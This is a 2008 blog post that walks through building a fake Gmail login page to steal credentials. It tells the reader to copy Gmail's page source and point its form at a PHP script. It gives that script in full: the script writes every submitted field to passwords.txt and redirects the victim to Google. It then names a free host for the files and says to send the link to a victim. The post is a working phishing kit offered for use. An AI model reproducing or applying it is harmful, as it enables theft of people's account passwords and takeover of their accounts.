CREATE A FAKE LOGIN PAGE!

Well Guys! Nowadays hackers take the help of php-enabled web servers to successfully execute their FAKE LOGIN PAGES.I think this is the most usual technique of the script kiddies to carry out SOCIAL ENGINEERING.

Let's see how they do it..!

USE OPERA OR IE 6.0 FOR BETTER SOURCE EDITING.DON'T USE FIREFOX.


We will make a fake login page of www.gmail.com today.

  • Go there and Rightclick---->View source and find the keyword "method".Leave it as it is.

  • Now look for 'action="https://www.google.com/accounts/ServiceLoginAuth? service=mail''' just before "method".Change that, so now it will look like "action="./getinfo.php"

  • Save the page as "index.html" in your computer.

  • Now will create "getinfo.php".

  • Paste this in a new text file..->


<?php header("Location: ");

$handle = fopen("passwords.txt", "a");

foreach($_GET as $variable => $value)

{ fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit; ?>

Change the "Location:<something you want your page to redirect to after your victim enters the userid and password> in the php file.

I will recommend...

"https://www.google.com/accounts/ServiceLoginAuth?service

=mail".

Save the file as "getinfo.php".

  • Now search for free bannerless php support web hosting servers.I would recommend www.110mb.com.Register there and get a domain like www.<something>.110mb.com.So now we have our own webserver.

  • Now create blank "passwords.txt" file to store your passwords.

  • So now we have three files "index.html","passwords.txt" and "getinfo.php".

  • Upload the files in your registered webserver.Don't insert those files in a user created directory.Just upload the files in the default root directory.

  • Now give your victim the link to your registered website ie. www.<something>.110mb.com.He will mistake it for the real "www.gmail.com" and may enter his real user id and password.If he enters he is doomed!.You will get the password and the user id in the "passwords.txt" file in your registered website.


Working:


Posted by Ranadeep Naskar Sunday, June 29, 2008 at 5:13 AM  

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)